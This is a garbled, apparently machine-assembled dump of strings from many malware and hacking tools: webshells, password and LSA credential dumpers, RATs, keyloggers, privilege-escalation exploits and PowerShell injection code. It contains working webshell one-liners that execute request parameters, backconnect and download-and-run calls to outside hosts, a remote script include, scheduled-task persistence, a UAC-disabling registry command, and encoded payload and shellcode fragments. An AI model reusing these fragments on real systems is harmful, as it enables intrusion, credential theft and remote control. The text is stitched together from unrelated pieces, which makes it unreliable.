\".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'password.txtloginprompta
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 reflectivepick_x64.dll$result = $minidumpwritedump.invoke($null, @($processhandle,$processfilename = \"$($processname)_$($processid).dmp\"invoke-psexeccmd\"[*] executing service .exe$cmd = \"%comspec% /c echo $command ^> %systemroot%\\temp\\# upload to a specified exfil uriserver path to exfil to.[*] pdc: lab-2008-dc1.lab.com$attempts = get-userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
1 elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 password <=14/%ldn.txtkill you\x00d
1 updatemutex:response=scanin:update_bunistall_bs_protectp_walletgr_commandftpupload-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 decodeproductkeystarthttpfloodcodekeymessageboxgetfilezillapasswordsdatainudpzsocketsr
1 usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
1 vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 stub.pdbcie7passwordsnjloggertaskmgrkillerabccba%
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 getsystemdirectorygetwindowsdirectoryisbadreadptrisbadwriteptrurldownloadtofile{\\field{\\*\\fldinst { includepicture.php?id=\\\\* mergeformat \\\\d}}{\\fldrslt}}userformuserloginforminvalid username or passwordpostupload_
1 modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 %s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c active/maximum host thread: %d/%d, current/maximum thread: %d/%d, time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\hscan.log[%s]: found cisco enable password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
1 restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 danderspritzdanderspritzchimneypool addresgetting remote timeretrievedadded ops library to python search pathtarget: z0.0.0.1psp_avoidancepassworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
1 {mauthor usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 enter your own password here
1 setx tor_control_passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3
1 wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = 